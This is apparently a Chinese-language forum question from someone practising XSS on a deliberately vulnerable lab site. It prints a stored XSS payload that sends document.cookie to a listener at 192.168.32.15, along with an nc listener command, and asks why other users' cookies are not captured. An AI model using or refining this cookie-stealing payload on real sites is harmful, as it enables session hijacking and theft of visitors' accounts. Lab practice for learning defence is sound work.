我想更好地了解XSS,以便可以帮助拥有小型企业的朋友保护自己。因此,我上网了,并使用其中一个Kali Linux易受攻击的站点来实践XSS。
因此,我发现其中一个挑战已存储XSS漏洞,并通过以下代码对其进行了充分利用:<script>image = new Image(); image.src='http://192.168.32.15:80/?'+document.cookie;</script>
在About us页面上,您可以在其中插入评论。
然后,在Linux终端上,我做了nc -l -p 80
来监听流量-但是我得到的唯一cookie是当我单击该页面时。该网站上还有一个或两个用户,从本质上讲,我正在尝试获取其Cookie,但似乎并没有在我的终端上获取它。
任何帮助将不胜感激。
谢谢